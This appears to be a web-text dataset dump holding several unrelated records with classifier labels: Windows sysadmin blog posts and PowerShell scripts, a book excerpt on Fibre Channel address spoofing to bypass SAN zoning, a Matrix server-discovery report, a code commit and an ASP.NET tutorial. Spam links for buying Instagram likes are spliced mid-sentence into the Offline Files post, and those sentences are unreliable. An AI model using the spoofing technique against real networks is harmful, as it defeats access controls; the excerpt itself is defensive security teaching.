content
stringlengths
228
999k
pred_label
stringclasses
1 value
pred_score
float64
0.5
1
Author Archives: Geoff About Geoff Sr. System Administrator at the University of Vermont Robocopy file classes This information comes from the Robocopy.exe documentation PDF file for Windows XP version, but it’s the best description I’ve been able to find. From page 15 of that document: Using Robocopy File Classes For each directory processed, Robocopy constructs a list of files in both the source and destination directories. This list matches the files specified on the command line for copying. Robocopy then cross-references the lists, determining where files exist and comparing file times and sizes. The program places each selected file in one of the following classes. File Class In source In destination Source/Dest file times Source/dest file sizes Source/dest attributes Lonely Yes No n/a n/a n/a Tweaked Yes Yes Equal Equal Different Same Yes Yes Equal Equal Equal Changed Yes Yes Equal Different n/a Newer Yes Yes Source > Destination n/a n/a Older Yes Yes Source < Destination n/a n/a Extra No Yes n/a n/a n/a Mismatched Yes (file) Yes (directory) n/a n/a n/a By default, Changed, Newer, and Older files are candidates for copying (subject to further filtering, as described later). Same files are not copied. Extra and Mismatched files and directories are only reported in the output log. Normally, Tweaked files are neither identified nor copied – they are usually identified as Same files by default. Only when /IT is used will the distinction between Same and Tweaked files be made, and only then will Tweaked files be copied. Readable System Event logs I think I’m not alone in finding the Service Control Manager logs so many informational events as to make it hard to read the important events in the System Event logs on modern Windows systems. I’ve used custom XPath queries of Event logs before, and decided to define a Custom view of the System event log that suppresses the events generated by the Service Control Manager that are in the Informational or Verbose catergories. Here’s the XML that defines this custom view: <QueryList> <Query Id="0" Path="System"> <Select Path="System">*</Select> <Suppress Path="System">*[System[Provider[@Name='Service Control Manager'] and (Level=4 or Level=0 or Level=5)]]</Suppress> </Query> </QueryList> References: Renaming directories with invalid names Somehow, a client managed to create several directories with names that ended with a period. However, File Explorer and other tools (i.e., backup) are unable to access the folder contents, getting an error that usually is interpreted as “The system cannot find the file specified.” According to KB2829981, the Win32_API is supposed to remove trailing space and period characters. KB320081 has some helpful suggestions, and also indicates that some techniques allow programs to bypass the filename validation checks, and some POSIX tools are not subject to these checks. I found that I was able to delete these problem folders by using rmdir /q /s “\\?\J:\path\to\bad\folder.” But I wanted to rename the folders in order to preserve any content. After flailing about for a while, including attempts to modify the folders using a MacOS Client and a third-party SSH service on the host, I was prodded by my colleague Greg to look at Robocopy. In the end, my solution was this: 1. I enabled 8dot3 file name creation on a separate recovery volume (I didn’t want to do so on the multi-terabyte source volume) 2. Using robocopy, I duplicated the parent folder containing the invalid folder names to the recovery volume, resulting in the creation of 8dot3 names for all the folders 3. I listed the 8dot3 names of the problem folders with dir /x 4. The rename command with the short name as a source and a valid new name This fixed the folders, and let me access their contents. I then deleted the invalid folders from the source and copied the renamed folders into place. It seems like a simple process, but I managed to waste most of a morning figuring this out. Hopefully, this may save someone else some time. Troubleshooting Offline Files My previous post describes the normal operation of Offline Files. And most of the time, “it just works.” But there are times when it won’t, and getting it running again can be challenging. Two Important concepts First, it’s important to understand that the Offline Files facility is providing a virtual view of the network folder to which Documents has been redirected when Windows detects that the network folder is unavailable. This means that, when Offline Files is really borked, users can see different things in their Documents folder depending one whether their computers are online or offline. Second, Windows treats different names for the same actual server as if they are different servers altogether. Specifically, Windows will only provide the Offline Files virtual view for the path to the target network folder. You can see the target folder path in the Properties of the Documents folder. The Location tab shows the UNC path to the target network folder. The Location tab shows the UNC path to the target network folder. For example, these two UNC paths resolve to the same network folder: \\files.uvm.edu\rallycat\MyDocs \\winfiles1.campus.ad.uvm.edu\rallycat\MyDocs If the second path is the one that is shown in the Location tab in the properties of the Documents folder, then you will be able to access that path while offline, but not the first path. Show me the logs There are event logs that can be examined. I’ll mention them, but I’ve rarely found them helpful in solving a persistent problem. If you want to get the client up and running again ASAP, skip ahead to the Fix it section. There are some logging options available that can help in diagnosing problems with offline files. There are two logs that are normally visible in the Windows Event Viewer, under the Applications and Services logs heading: • Microsoft-Windows-Folder Redirection/Operational • Microsoft-Windows-OfflineFiles/Operational Continue reading Folder Redirection and Offline Files  The following information is not new. We are in the process of making changes to our Folder Redirection policy, though, and I thought it might be helpful to have this baseline information in a place that is handy for referral. Background Offline Files is a feature of Windows that was introduced in parallel with Folder Redirection in Windows 2000. Folder Redirection allows an administrator to relocate some of the user profile data folders to a network folder, which has the advantage of protecting that data from loss due to workstation issues like drive failure, malware infection, or theft. It also means you can access your data from multiple workstations. The Offline Files facility provides a local cache of the redirected folder(s) so that mobile users can continue to work with the data in those folders when disconnected from the organization’s network. When the computer is connected to the network again, any changes to either the network folder or the local Offline Files cache are synchronized. Users are prompted to resolve any conflicting changes, e.g., the same file was modified in both places, or was deleted from one and modified in the other at http://followersguru.net/. At UVM, we use Folder Redirection on the Documents folder (formerly My Documents in XP), as well as the Pictures, Video, and Music folders. Most of the time, the Offline Files facility works without issue. However, as with all technology, Offline Files can fail. There are circumstances that can result in the corruption of the database that Offline Files uses to track the sync status of files. Doing major reorganizing and renaming of files and folders, for example, seems to be a culprit. Another one is filling your quota; you can continue to save files to your local cache, but the files won’t get synced to the server because you’re out of space at http://followersguru.net/buy-instagram-likes/ . How to sync your offline files To manually synchronize your Offline Files with the target network folder, open the Sync Center by: 1. Going to the Start Screen (or menu) and typing sync center 2. Clicking the Sync Center item in the search results Windows 8.1 Start search for "sync center" Windows 8.1 Start search for “sync center” Windows 7 Start search for "sync center" Windows 7 Start search for “sync center” or 1. Find the Sync Center tray icon and double-click it, or 2. Right-click and select the Open Sync Center menu item Menu for the Sync Center icon in the Windows system tray. Menu for the Sync Center icon in the Windows system tray. The Sync Center Window should appear. Offline Files status in Sync Center Offline Files status in Sync Center Note that the Offline Files item shows the time of the most recent sync operation. If you want to initiate a sync operation, click Offline Files and then click Sync. A sync operation has completed. A sync operation has completed. If there are errors or conflicts that require intervention to resolve, those will be show in the result. A conflict result is shown below. Sync operation with a conflict. Sync operation with a conflict. Click the N Conflicts link or View sync conflicts on the left to see details about the files in conflict. Right-click or select and click 'Resolve'. Right-click or select and click ‘Resolve’. Select each file conflict you want to resolve, and click Resolve or right-click the file and select View options to resolve… Windows provides information about the files in conflict and provides several appropriate options. Windows provides information about the files in conflict and provides several appropriate options. In this scenario, a file has been deleted in one location, and modified while offline in the other. Since only the one file exists, there are only two options: delete the file, or copy it to both locations. Another scenario involves a file have been modified both offline and online, probably while using multiple computers. In that case, the resolution Window offers three choices: pick the offline file (on this computer), pick the online version (on the network folder), or keep both by renaming one of them. Sync Errors are handled differently, and may require the help of your IT support staff or the UVM Tech Team. A sync operation with error. A sync operation with error. To review the errors or conflicts, you can view the Sync Results. Sync result, with detail for an error. Sync result, with detail for an error. You can view details about an individual error by hovering over it with the mouse cursor. In the example above, my folder “2. Archive” is throwing an “Access is denied” error. To resolve an error like this, it may be necessary to contact the Tech Team. In some cases, it’s necessary to reset the Offline Files tracking database and essentially start over. This procedure is documented in a separate post, Troubleshooting Offline Files. PowerShell Script: New-RandomString.ps1 I need to automate the setting of passwords on some Active Directory accounts. Since resetting passwords is also a task that I’m asked to perform with some routine, I decided to make a more generic tool script that could be used in a variety of tasks ( I listened to Don Jones‘ advice on building Tools and Controllers). I also got a head start from Bill Stewart’s useful Windows IT Pro article Generating Random Passwords in PowerShell.  Among the changes I made are source character class handling, and a new SecureString output option. Please let me know if you find the script useful, or if you find any bugs. <# .SYNOPSIS Generates one or more randomized strings containing specified character classes. .PARAMETER Length The length of the string to be generated. .PARAMETER CharacterClasses An array of Character Classes from which to generate the string. The string will contain at least one character from each specificied class. You may also use the alias 'Classes' for the parameter name Valid Character classes are: Upper - A..Z Lower - a..z Digits - 0..9 AlphaNum - shorthand for Upper,Lower,Digits Symbols - !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ Safe - #$%+-./:=\_~ (ODBC Safe, Shell Safe if quoted) If no classes are specified, a string is generated with mixed-case letters, digits, and symbol characters (i.e., ALL the classes). .PARAMETER IncludeCharacters A string of characters to include in the generated string: .PARAMETER ExcludeCharacters A string a characters to exclude in the generated string: .PARAMETER Count The number of strings to be generated. .PARAMETER AsSecureString Specifies that the new random string(s) will be returned as Secure String objects, to make their use as passwords easier. .EXAMPLE > New-RandomString.ps1 -CharacterClasses Lower,Digits -Length 14 -Count 5 Generated five strings, each fourteen characters long, comprised of lowercase letters and digits. .EXAMPLE > New-RandomString.ps1 -Classes AlphaNum,Symbols -length 21 > New-RandomString.ps1 -length 21 The previous two commands are equivalent, because the default character classes used are upper and lowercase letters, digits, and symbol characters. .EXAMPLE > New-RandomString.ps1 -Class 'AlphaNum' -Include '#$%^' The generated string will contain characters from the UpperCase, LowerCase and Digits classes, as well as at least one character from among the four specified. .EXAMPLE > New-RandomString.ps1 -Class 'AlphaNum' -Exclude 'O0l1' The generated string will contain characters from the UpperCase, LowerCase and Digits classes, but will not contain the "look-alike' characters. .Notes Author : Geoff Duke <[email protected]> Last Edit : 2014-11-07 Based on script "Get-RandomString.ps1" for Windows IT Pro: http://windowsitpro.com/powershell/generating-random-passwords-powershell #> #Requires -version 3 [cmdletbinding()] Param( [alias('Size')] [ValidateRange(7,256)] [int] $length = 21, [int] $count = 1, [Parameter()] [ValidateSet('Upper','Lower','Digits','AlphaNum','Symbols','Safe')] [alias('Classes')] [String[]] $CharacterClasses = @('Upper','Lower','Digits','Symbols'), [Parameter()] [string] $IncludeCharacters = '', [string] $ExcludeCharacters = '', [switch] $AsSecureString ) Set-StrictMode -version 'Latest' # Additional parameter wrangling # -------------------------------------------------------------------- [string[]] $Classes = $CharacterClasses.ToLower() if ( $Classes.Contains('safe') -and $Classes.Contains('symbols') ) { write-warning 'You specified both "Symbols" and "Safe" character classes; this is the same as just specifying "Symbols".' $Classes = $Classes | where { $_ -ne 'safe' } } # Replace alphanum with the upper,lower, and digits classes if ( $Classes.Contains('alphanum') ) { $Classes = $Classes | where { $_ -ne 'alphanum' } $Classes += 'upper','lower','digits' } # remove any duplicated classes $Classes = $Classes | select -unique # Setup source characters # -------------------------------------------------------------------- # Character classes - functionally, a strongly-typed hash of string arrays # (addresses issue of singleton arrays turning into simple strings) $chars = New-Object 'Collections.Generic.Dictionary[string,char[]]' $chars['lower'] = 97..122 | foreach-object { [Char] $_ } $chars['upper'] = 65..90 | foreach-object { [Char] $_ } $chars['digits'] = 48..57 | foreach-object { [Char] $_ } $chars['symbols'] = (33..47+58..64+91..96+123..126) | foreach-object { [Char] $_ } $chars['safe'] = '#$%+-./:=\_~'.ToCharArray() write-verbose $( 'String must include a character from each of ' + $( $Classes -join ',' ) + $( if ( $IncludeCharacters ) { " plus [$IncludeCharacters] " } ) + $( if ( $ExcludeCharacters ) { "but must not include any of [$ExcludeCharacters]" } ) ) if ( $IncludeCharacters ) { $Classes += 'include' $chars['include'] = $IncludeCharacters.ToCharArray() } [char[]] $char_source = $chars[ $Classes ] | % { $_ } | select -unique if ( $ExcludeCharacters ) { $char_source = $char_source | Where { $_ -NotIn $ExcludeCharacters.ToCharArray() } } write-verbose "Source chars: $(-join $char_source)" # Generating the random string(s) # -------------------------------------------------------------------- $string_count = 0 :NewString while ( $string_count -lt $Count ) { $output = '' for ( $i=0; $i -lt $length; $i++) { $output += get-random @($char_source) } write-debug "NewString: generated string is -> $output" # Ensure that the requested character classes are present :CharClass foreach ($class in $Classes) { foreach ( $char in $output.ToCharArray() ) { if ( $chars[$class] -Ccontains $char ) { write-debug "CharClass: '$char' is in $class" continue CharClass # check the next character class } } # end foreach $char, didn't match the current character class write-debug "CharClass: No character from $class! Start again" continue NewString # Need to generate a new string } # end foreach #class # string matches required character classes" $string_count++ if ( $AsSecureString ) { ConvertTo-SecureString $output -AsPlainText -Force } else { $output } } # end while It was while I was writing this script that I ran into the Loop Label documentation error. In PowerShell, as in Perl, Loop Labels do not include the colon when used with a break or continue statement. PowerShell documentation error – loop labels I’ve been banging my head on a problem with a script I’m writing. I want to stop executing an inner loop and resume with the next iteration of an outer loop. In Perl, I’d use a next statement with a loop label. In PowerShell, the analogous statement is continue, and loop labels are supported, as described in the about_Break help document. I finally wrote simplified test code, following the documentation carefully. However, the documentation is wrong. It indicates that the break or continue statement should include the colon in the loop label. This doesn’t throw an error, but it executes as though the label isn’t present at all. The code below includes the colon. $VerbosePreference = 'Continue' write-warning 'There should be no output; the outer loop should be exited during first iteration' :outer foreach ($a in ('red','green') ) { write-verbose "Outer loop" :inner foreach ($b in ('red','blue','green') ) { write-verbose "Inner loop" write-verbose "`$a is $a ; `$b is $b" if ( $a -eq $b ) { break :outer } "$a $b" } } Then cracked my copy of PowerShell in Action and saw that the loop label does not include the colon, just like Perl. Remove the colon and everything is good. Wish it hadn’t taken me hours to work it out.   Get-PrintJobs.ps1 PowerShell script After a recent upgrade of our print servers, I discovered that the Print Spooler service event logging had been enhanced, and changed enough that some PowerShell reporting scripts that worked just fine on Windows Server 2008 (32-bit) no longer worked on Server 2012 R2. To get the reports working again, I had to enable the Microsoft-Windows-PrintService/Operational log. I also had to increase the log size from the default in order to retain more than one day’s events. The trickiest part was figuring out the XPath query syntax for retrieving events from a particular printer. The newer syntax makes more sense to me, but it took me a long time to arrive at it. Following Don Jones‘ entreaty to build tools and controllers, I offer this tool script, which retrieves (simplified) print job events, and cares not a whit about formatting or saving. <# .SYNOPSIS Gets successful print job events and returns simplified objects with relevant details. .DESCRIPTION Collects the successful print jobs from the PrintService Operational log, with optional query parameters including Printer name and start and end times. .PARAMETER PrinterName The share name of the printer for which events will be retrieved. .PARAMETER StartTime The beginning of the interval during which events will be retrieved. .PARAMETER EndTime The end of the interval during which events will be retrieved. .EXAMPLE C:\> Get-PrintJobs.ps1 Returns objects representing all the successful print jobs (events with id 307). .EXAMPLE C:\> Get-PrintJobs.ps1 -PrinterName 'Accounting HP LaserJet' Returns objects for all the jobs on the Accounting printer. .EXAMPLE C:\> Get-PrintJobs.ps1 -PrinterName 'Accounting HP LaserJet' -StartTime (Get-Date).AddHours(-12) Returns objects for all the jobs on the Accounting printer generated in the last twelve hours. .NOTES Script Name: Get-PrintJobs.ps1 Author : Geoff Duke <[email protected]> Edit 2014-10-08: Generalizing from dept printer report script, fixing XPath query syntax. Edit 2012-11-29: Job is run as SYSTEM, and computer object has been granted Modify rights to the destination directory. #> Param( [string] $PrinterName, [datetime] $StartTime, [datetime] $EndTime ) Set-StrictMode -version latest # Building XPath query to select the right events $filter_start = @' <QueryList> <Query Id="0" Path="Microsoft-Windows-PrintService/Operational"> <Select Path="Microsoft-Windows-PrintService/Operational"> '@ $filter_end = @' </Select> </Query> </QueryList> '@ $filter_match = '*[System[(EventID=307)' #need to add ']]' to close if ( $StartTime -or $EndTime) { $filter_match += ' and TimeCreated[' #need to add ']' to close $time_conds = @() if ( $StartTime ) { $time_conds += ( '@SystemTime&gt;=' + "'{0:yyyy-MM-ddTHH:mm:ss.000Z}'" -f $StartTime.ToUniversalTime() ) } if ( $EndTime ) { $time_conds += ( '@SystemTime&lt;=' + "'{0:yyyy-MM-ddTHH:mm:ss.000Z}'" -f $EndTime.ToUniversalTime() ) } $filter_match += ( $time_conds -join ' and ' ) + ' ]' # Closing TimeCreated[ } $filter_match += "]]`n" # Closing [System[ if ( $PrinterName ) { $filter_match += @" and *[UserData[DocumentPrinted[(Param5='$PrinterName')]]] "@ } write-debug "Using Filter:`n $filter_match" # The $filter variable below is cast as XML, that's getting munged # by WordPress or the SyntaxHighlighter as '1' $filter = ($filter_start + $filter_match + $filter_end) get-winevent -filterXML $filter | foreach { $Properties = @{ 'Time' = $_.TimeCreated; 'Printer' = $_.Properties[4].value; 'ClientIP' = $_.properties[3].value.SubString(2); 'User' = $_.properties[2].value; 'Pages' = [int] $_.properties[7].value; 'Size' = [int] $_.properties[6].value } New-Object PsObject -Property $Properties } If you find this script useful, please let me know. If you find any bugs, definitely let me know!
__label__pos
0.655691
Fibre Channel address weaknesses Fibre Channel address weaknesses include manipulation of the 24-bit fabric address, which can cause significant damage and denial of service in a storage area network (SAN). Learn where the vulnerabilities lie in this excerpt from "Securing Storage: A Practical Guide to SAN and NAS Security." Fibre Channel address weaknesses Now that we have established that attacks don't change, but they do get modified, let's discuss another attack that stems network and application history. Manipulation of the 24-bit fabric address can cause significant damage and denial of service in a SAN. Each node in a SAN has a 24-bit fabric address that is used for routing, among other things. Along with routing frames correctly to/from their source and destinations, the 24-bit address is also used for name server information. The name server is a logical database in each Fibre Channel switch that correlates a node's 24-bit fabric address to their 64-bit WWN. Additionally, the name server is also responsible for other items, such as mapping the 24-bit fabric address and 64-bit WWN to the authorized LUNs in the SAN. Furthermore, address information is also used for soft and hard zoning procedures (discussed in the Chapter 4, "SANs: Zone and Switch Security"). The 24-bit fabric address of a node determines route functions with soft and hard zoning procedures, specifically if a frame is allowed to pass from one zone to the other. While there are several other uses of the 24-bit address, the use of the address in name servers and zoning procedures are by far the most important in terms of security. The major issues with the 24-bit address is that it is used for identification purposes for both name server information and soft/hard zone routing, almost like an authorization process, but it is an entity that can be easily spoofed. Using any traffic analyzer, the 24-bit source address of a Fibre Channel frame could be spoofed as it performs both PLOGI (Port Login) and FLOGI (Fabric Login) procedures. In Fibre Channel, there are three different types of login—Port Login, Fabric Login, and Node Login. Two can be corrupted with a spoofed 24-bit fabric address. Before we discuss how spoofing disrupts these processes, let's discuss the login types first. FABRIC LOGIN (FLOGI), PORT LOGIN (PLOGI), AND NODE LOGIN (NLOGI) The Fabric Login (FLOGI) process allows a node to log in to the fabric and receive an assigned address from a switch. The FLOGI occurs with any node (N_Port or NL_Port) that is attached to the fabric. The N_Port or NL_Port will carry out the FLOGI with a nearby switch. The node (N_Port or NL_Port) will send a FLOGI frame that contains its node name, its N_Port name, and any service parameters. When the node sends its information to the address of 0xFFFFFE, it uses the 24-bit source address of 0x000000 because it hasn't received a legitimate 24-bit address from the fabric yet. The FLOGI will be sent to the well-known fabric address of 0xFFFFFE, which is similar to the broadcast address in an IP network (though not the same). The FC switches and fabric will receive the FLOGI at the address of 0xFFFFFE. After a switch receives the FLOGI, it will give the N_Port or NL_Port a 24-bit address that pertains to the fabric itself. This 24-bit address with be in the form of Domain-Area-Port address from, where the Domain is the unique domain name (ID) of the fabric, Area is the unique area name (ID) of the switch within the domain, and Port is the unique name (ID) of each port within the switch in the fabric. Table 2.3 shows how the 24-bit address is made. Table 2.3 24-Bit addresses   24-Bit Address Type Description 8-bit domain name Unique domain ID in a fabric. Valid domain IDs are between 1 and 239. 8-bit area name Unique area ID on a switch within a fabric. Valid area IDs are between 0 and 255. 8-bit port name Unique area ID on a switch within a fabric. Valid area IDs are between 0 and 255. A 24-bit address (port ID) uses the following formula to determine a node's address: Domain_ID x 65536 + Area_ID x 256 + Port_ID = 24 bit Address An example address for and node on the first domain (domain ID of 1), on the first switch (area ID of 0), and the first port (port ID of 1), would be the following: 1 x 65536 + 0 x 256 + 1 = 65537 (Hex: 0x10001)  After the node has completed the FLOGI and has a valid 24-bit fabric address, it will perform a Port Login (PLOGI) to the well-known address of 0xFFFFFC to register its new 24-bit address with the switch's name server, as well as submit information on its 64-bit port WWN, 64-bit node WWN, port type, and class of service. The switch then registers that 24-bit fabric address, along with all the other information submitted, to the name server and replicates that information to other name servers on the switch fabric. Figures 2.14 and 2.15 show the FLOGI and PLOGI processes. Figure 2.14 FLOGI process. Figure 2.15 PLOGI process. A Node Login is somewhat similar to a Fabric Login, but instead of logging in to the fabric, the node would log in to another node directly (node to node communication). The node will not receive any information from the fabric, but will receive information from the other node as it relates to Exchange IDs (OX_ID and RX_ID) and session information (Seq_ID and Seq_CNT). After this information has been exchanged, the two nodes will begin to communicate with each other directly. FLOGI, PLOGI, AND ADDRESS SPOOFING Now that we have established facts concerning FLOGI, PLOGI, and address spoofing, let's understand how the weaknesses interrelate them. After performing the FLOGI process, an FC node needs to perform a PLOGI to the well-known address of 0xFFFFFC. The PLOGI then registers the 24-bit address of the node to the Name Server (also referred to as a Simple Name Server) of the switch. If an entity were to spoof their 24-bit fabric address and send it to the address of 0xFFFFFC, the switches would see a node performing a PLOGI. Once the switch receives the information from the PLOGI frame, it will register the spoofed 24-bit address of the node to the name server—thus, polluting the name server with incorrect information. You might wonder what the big deal is since the node has corrupted its own information; however, consider the fact that the 24-bit address is used for hard and soft zoning. For example, let's say the 24-bit address of 65537 (Hex: 0x10001) was allowed to route to nodes in zone A and no other addresses can access that zone. A malicious attacker has the address of 65541 (Hex: 0x10005) and cannot access that zone. The malicious attacker can spoof (change) their 24-bit address to match 65537 (0x10001) and then route frames to the restricted zone A, despite being unauthorized to do so. Spoofing the 24-bit address during PLOGI negates any route- based zoning rules that may have been applied. The simple process of spoofing now creates the ability to route (hop) across hard and soft zoning rules. Figure 2.16 shows the FLOGI/PLOGI spoofing process. Figure 2.16 FLOGI/PLOGI spoofing process. We will take this idea a bit further in the next section, "man-in-the-middle Attacks," when I discuss the issues of spoofing the 24-bit fabric address and spoofing a node WWN. The fact is that this attack is very severe by breaking the integrity of any hard or soft zoning rules. However, a traffic analyzer is required to perform this attack, thus creating barriers to perform the attack itself. Use the following table of contents to navigate to chapter excerpts or click here to view SANs: Fibre Channel Security in its entirety.     Securing Storage: A Practical Guide to SAN and NAS Security   Home: SANs: Fibre Channel Security: Introduction   1: SAN risks   2:Fibre Channel risks   3:Clear-text communication   4:SAN hacking   5:Fibre Channel frame weaknesses   6:Session hijacking: assessment exercise   7:Fibre Channel address weaknesses   8: Fibre Channel man-in-the-middle attacks   9: Fibre Channel address weaknesses: assessment exercise About the book:      Securing Storage: A Practical Guide to SAN and NAS Security is an indispensable resource for every storage and security professional, and for anyone responsible for IT infrastructure, from architects and network designers to administrators. You've invested heavily in securing your applications, operating systems, and network infrastructure. But you may have left one crucial set of systems unprotected: your SAN, NAS, and iSCSI storage systems. Securing Storage reveals why these systems aren't nearly as secure as you think they are, and presents proven best practices for hardening them against more than 25 different attacks. Purchase Securing Storage: A Practical Guide to SAN and NAS Security the book from Addison-Wesley Publishing About the author:      Himanshu Dwivedi is a founding partner of iSEC Partners, a digital security services and products organization. Before forming iSEC Partners, Himanshu was the Technical Director for @stakes San Francisco security practice, a leader in application and network security. His professional experience includes application programming, infrastructure security, and secure product design with an emphasis on storage risk assessment.   This was last published in April 2007 Dig Deeper on Primary and secondary storage Start the conversation Send me notifications when other members comment. Please create a username to comment. -ADS BY GOOGLE MicroscopeUK SearchSecurity SearchStorage SearchNetworking SearchCloudComputing SearchDataManagement SearchBusinessAnalytics Close
__label__pos
0.55052
Librem Chat: the librem.one webserver doesn't host the Client-Server API's well-known URI for server discovery The domain part of all Matrix user IDs at Librem Chat’s homeserver is librem.one, but the actual hostname of the homeserver is chat.librem.one instead. Therefore, the “Server Discovery” feature of Matrix is necessary for both clients and other homeservers to be able to find the correct hostname of any Librem Chat user’s homeserver. Currently, there is an SRV record named _matrix._tcp.librem.one present in the DNS, and its target is chat.librem.one. This makes the Server Discovery feature work correctly for other homeservers federating with Librem Chat’s homeserver, according to the “Resolving server names” section (i.e. section 2.1) of Matrix’s Server-Server API specification. By contrast with the Server-Server API, though, the “Server Discovery” section (i.e. section 3) of Matrix’s Client-Server API specification does not say that Matrix clients should use DNS SRV records for server-discovery purposes. (In fact, the Client-Server API specification doesn’t mention SRV records at all.) Instead, it says that the /.well-known/matrix/client Well-Known URI should be used for client-to-server Server Discovery instead. However, the web server at librem.one isn’t hosting anything at its /.well-known/matrix/client URL – i.e. you’ll currently get a 404 Not Found error if you try to retrieve that URL. Consequently, it’s not possible for a Librem Chat user to log in using many/most Matrix client apps unless they manually enter in both their user ID (whose domain part is librem.one) and the chat.librem.one hostname separately; otherwise, they’ll get an error message, because the client will try to use librem.one (instead of chat.librem.one) as the hostname of the homeserver. (For example, nheko will give an error message that says "The required endpoints were not found. Possibly not a Matrix server. in this scenario, and then will need to manually enter chat.librem.one into the “Hostname” field on the login screen in order to log in successfully. Similarly, in SchildiChat, the user will not be able to log in to Librem Chat using the “Sign in with Matrix ID” option on the login screen; they’ll need to use the “Custom server” option instead.) Also, the web server at librem.one isn’t hosting anything at its /.well-known/matrix/server Well-Known URI for server-discovery by other homeservers that’s specified in the aforementioned part of Matrix’s Server-Server API specification as an alternative to the use of a DNS SRV record. This currently doesn’t cause any problems (because in the absence of that Well-Known URI, homeservers will “fall back” to using the DNS SRV record for server-discovery instead), but someone in nheko’s issue tracker warned that “Matrix Spec may be removing the entire SRV support” in the future (see MSC3922 – i.e. pull-request 3922 in the matrix-org/matrix-spec-proposals repo on GitHub – for more details about this). (Incidentally, the webserver at chat.librem.one actually does host the correct JSON data for server discovery at its /.well-known/matrix/client URL. But, because the domain part of all Matrix user IDs at Librem Chat’s homeserver is librem.one rather than chat.librem.one, that URL won’t be used by a Matrix client when a user whose user ID’s domain is librem.one tries to log in.) 1 Like Random question: Would the Matrix client support and respect an HTTP redirect if librem.one redirected to the same path but on chat.librem.one?
__label__pos
0.73983
Commits Anonymous committed f89ec34 Issue number: ww-997 git-svn-id: http://svn.opensymphony.com/svn/xwork/trunk@687e221344d-f017-0410-9bd5-d282ab1896d7 Comments (0) Files changed (1) src/java/com/opensymphony/xwork/validator/validators/VisitorFieldValidator.java /** - * The VisitorFieldValidator allows you to forward validation to object + * <!-- START SNIPPET: javadoc --> + * <p>The VisitorFieldValidator allows you to forward validation to object * properties of your action using the object's own validation files. This * allows you to use the ModelDriven development pattern and manage your * validations for your models in one place, where they belong, next to your * model classes. The VisitorFieldValidator can handle either simple Object - * properties, Collections of Objects, or Arrays. + * properties, Collections of Objects, or Arrays.</p> + *<!-- END SNIPPET: javadoc --> + * + * + * <!-- START SNIPPET: parameters --> + * <ul> + * <li>fieldName - field name if plain-validator syntax is used, not needed if field-validator syntax is used</li> + * <li>context - the context of which validation should take place. Optional</li> + * <li>appendPrefix - the prefix to be added to field. Optional </li> + * </ul> + * <!-- END SNIPPET: parameters --> + * + * <pre> + * <!-- START SNIPPET: example --> + * &lt;validators&gt; + * &lt;!-- Plain Validator Syntax --&gt; + * &lt;validator type="visitor"&gt; + * &lt;param name="fieldName"&gt;user&lt;/param&gt; + * &lt;param name="context"&gt;myContext&lt;/param&gt; + * &lt;param name="appendPrefix"&gt;true&lt;/param&gt; + * &lt;/validator&gt; + * + * &lt;!-- Field Validator Syntax --&gt; + * &lt;field name="user"&gt; + * &lt;field-validator type="visitor"&gt; + * &lt;param name="context"&gt;myContext&lt;/param&gt; + * &lt;param name="appendPrefix"&gt;true&lt;/param&gt; + * &lt;/field-validator&gt; + * &lt;/field&gt; + * &lt;/validators&gt; + * <!-- END SNIPPET: example --> + * </pre> + * + * <!-- START SNIPPET: explanation --> + * <p>In the example above, if the acion's getUser() method return User object, WebWork + * will look for User-myContext-validation.xml for the validators. Since appednPrefix is true, + * every field name will be prefixed with 'user' such that if the actual field name for 'name' is + * 'user.name' </p> + * <!-- END SNIPPET: explanation --> + * + * * * @author Jason Carreira * @author Rainer Hermanns - * Created Aug 2, 2003 10:27:48 PM + * @version $Date$ $Id$ */ public class VisitorFieldValidator extends FieldValidatorSupport { Tip: Filter by directory path e.g. /media app.js to search for public/media/app.js. Tip: Use camelCasing e.g. ProjME to search for ProjectModifiedEvent.java. Tip: Filter by extension type e.g. /repo .js to search for all .js files in the /repo directory. Tip: Separate your search with spaces e.g. /ssh pom.xml to search for src/ssh/pom.xml. Tip: Use ↑ and ↓ arrow keys to navigate and return to view the file. Tip: You can also navigate files with Ctrl+j (next) and Ctrl+k (previous) and view the file with Ctrl+o. Tip: You can also navigate files with Alt+j (next) and Alt+k (previous) and view the file with Alt+o.
__label__pos
0.572188
Click here to Skip to main content Click here to Skip to main content Go to top Understanding and Implementing Repository and Unit of Work Pattern in ASP.NET MVC Application , 12 Apr 2013 Rate this: Please Sign up or sign in to vote. In this article we will try to see what is Repository and Unit of Work Pattern in an ASP.NET MVC application. Introduction In this article we will try to see what is Repository and Unit of Work Pattern in an ASP.NET MVC application. We will also implement a small rudimentary sample application to understand the same. Background  Possibility of using ORMs in our application saves us from a lot of code that needs to be written in order to create our entities and data access logic. But using ORMs like entity framework sometimes lead to scattered data access logic/predicates in various place in code. Repository and Unit of work pattern provides a clean way to access data and at the same time maintain the test-ablility of the application. Let us try to understand this by implementing a simple ASP.NET MVC application. Using the code Let us first try to create a simple database on which we will be performing CRUD operations. We will define a simple tables in the database as: Now with the database/table in created, we will go ahead and generate the ADO.NET entity data Model for these tables in our application. The generated entities will look like: Performing Simple Data Access Now we have the entity framework ready to be used in our application. We can very well use the Context class in each controller to perform database operations. Let us try to see this by trying to retrieve the data in our Index action of HomeController. public ActionResult Index() { List<Book> books = null; using (SampleDatabaseEntities entities = new SampleDatabaseEntities()) { books = entities.Books.ToList(); } return View(books); } And when we try to run this application, we will see that it is getting the data from the database as: Note: We will not be doing other CRUD operations here because they can be done on same lines very easily. To visualize the above implementation:   Now there is nothing wrong from the code and functionality perspective in doing this. But there are two problems in this approach. 1. The Data access code is scattered across the application and this is a maintenance nightmare. 2. The Action in the Controller is creating the Context inside itself. This makes this function non testable using dummy data and we can never be able to verify the results unless we use test data. Note: If the second point is not clear then it is recommended to read about Test Driven Development using MVC. We cannot discuss it in this article otherwise the article will become digressing. Creating a Repository Now how can we solve the problem. We can solve the problem by moving all the data access code of entity framework in one place. So let us define a class that will contain all the data access logic for Books table. But before creating this class, let us also think about the second problem for an instance. If we create a simple interface defining the contract for accessing the books data and then implement this interface in our proposed class, we will have one benefit. We can then have another class implementing the same interface but playing around with the dummy data. Now as long as the controller is using the Interface our test projects can pass the dummy data class and our controller will not complain. So let us first define the contract for accessing books data. // This interface will give define a contract for CRUD operations on // Books entity interface IBooksRepository { List<Book> GetAllBooks(); Book GetBookById(int id); void AddBook(Book book); void UpdateBook(int id, Book book); void DeleteBook(Book book); void Save(); } And the implementation of this class will contain the actual logic to perform the CRUD operations on the Books table. public class BooksRepository : IBooksRepository, IDisposable { SampleDatabaseEntities entities = new 